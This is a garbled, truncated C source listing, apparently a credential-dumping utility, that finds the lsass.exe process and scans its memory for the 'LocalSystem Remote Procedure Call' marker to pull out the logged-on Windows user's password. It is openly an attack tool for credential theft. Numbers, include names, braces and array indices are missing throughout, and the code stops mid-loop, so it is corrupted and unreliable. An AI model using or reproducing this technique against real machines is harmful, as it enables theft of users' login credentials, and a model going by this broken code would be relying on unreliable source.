⑴代码: //********************************************************************************
⑵// Version: V.
⑶// Coder: WinEggDrop
⑷// Date Release: //
⑸// Purpose: To Demonstrate Searching Logon User Password On Box,The Method
⑹// Used Is Pretty Unwise,But This May Be The Only Way To Review The
⑺// Logon User's Password On windows .
⑻// Test PlatForm: windows
⑼// piled On: VC++ .
⑽//********************************************************************************
⑾#include
⑿#include
⒀#include
⒁#define BaseAddress xb // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable
⒂char Password[MAX_PATH] = ; // Store The Found Password
⒃// Function ProtoType Declaration
⒄//------------------------------------------------------------------------------------------------------
⒅BOOL FindPassword(DWORD PID);
⒆int Search(char *Buffer,const UINT nSize);
⒇DWORD GetLsassPID();
⒈BOOL Is();
⒉//------------------------------------------------------------------------------------------------------
⒊// End Of Fution ProtoType Declaration
⒋int main()
⒌DWORD PID = ;
⒍printf("windows Password Viewer V. By WinEggDrop
⒎if (!Is()) // Check Out If The Box Is
⒏printf("The Program Can't Only Run On windows Platform
⒐return -;
⒑PID = GetLsassPID(); // Get The Lsass.exe PID
⒒if (PID == ) // Fail To Get PID If Returning Zerom
⒓return -;
⒔FindPassword(PID); // Find The Password From Lsass.exe Memory
⒕return ;
⒖// End main()
⒗//------------------------------------------------------------------------------------
⒘// Purpose: Search The Memory & Try To Get The Password
⒙// Return Type: int
⒚// Parameters:
⒛// In: char *Buffer --> The Memory Buffer To Search
①// Out: const UINT nSize --> The Size Of The Memory Buffer
②// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
③// Since The Password Is Near The Above Location,But It's Not Always True That
④// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
⑤// At Some Other Place.We Only Look For Luck
⑥//------------------------------------------------------------------------------------
⑦int Search(char *Buffer,const UINT nSize)
⑧UINT OffSet = ;
⑨UINT i = ;
⑩UINT j = ;
ⅠUINT Count = ;
Ⅱif (Buffer == NULL)
Ⅲreturn -;
Ⅳfor (i = ; i < nSize ; i++)
Ⅴ/* The Below Is To Find The Magic String,Why So plicated?That Will Thank MS.The Separation From Word To Word
ⅥIs Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
ⅦThe Magic String,We Have To Do It Manually And Slowly
Ⅷif (Buffer == 'L')
ⅨOffSet = ;
Ⅹif (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == )
㈠OffSet += strlen("LocalSystem") + ;
㈡if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == )
㈢OffSet += strlen("Remote") + ;
㈣if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == )
㈤OffSet += strlen("Procedure") + ;
㈥if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == )
㈦i += OffSet;
㈧if (i < nSize)
㈨ZeroMemory(Password,sizeof(Password));
㈩for (; i < nSize ; i++)